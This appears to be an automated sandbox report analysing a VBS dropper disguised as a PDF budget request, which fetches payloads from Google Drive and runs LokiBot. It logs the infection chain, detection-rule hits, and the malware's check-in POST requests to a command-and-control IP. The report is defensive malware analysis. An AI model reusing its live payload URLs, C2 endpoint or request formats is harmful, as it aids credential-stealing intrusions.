                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59108 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 137.184.191.215 137.184.191.215
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:59082 -> 172.217.18.110:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                Source: unknownHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 176Connection: close
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjw
                Source: powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2690295829.00000000045E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.2690295829.00000000045E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000001.00000002.1864327822.00000211955FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
                Source: powershell.exe, 00000001.00000002.1864327822.00000211955FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7h
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7P
                Source: powershell.exe, 00000004.00000002.2690295829.0000000004737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7XR#l
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948233936.0000000004250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt
                Source: powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/6
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/H
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
                Source: msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.1864327822.0000021194746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195625000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195625000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195625000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59083
                Source: unknownNetwork traffic detected: HTTP traffic on port 59082 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59083 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59082
                Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:59082 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:59083 version: TLS 1.2

                System Summary

                Source: amsi64_7408.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: amsi32_7784.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted]
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, Initial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exe, Process created: Commandline size = 7174
                Source: unknown, Process created: Commandline size = 7174
                Source: amsi64_7408.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: amsi32_7784.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7784, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winVBS@8/10@5/5
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Reebok.Dia
                Source: C:\Windows\SysWOW64\msiexec.exe, Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
                Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl2fnnjw.zmj.ps1
                Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7408
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7784
                Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: msiexec.exe, 00000008.00000003.2158716208.000000001FAD5000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, ReversingLabs: Detection: 18%
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, Virustotal: Detection: 20%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (same obfuscated command line as the System32 powershell.exe launch above)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exe, Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
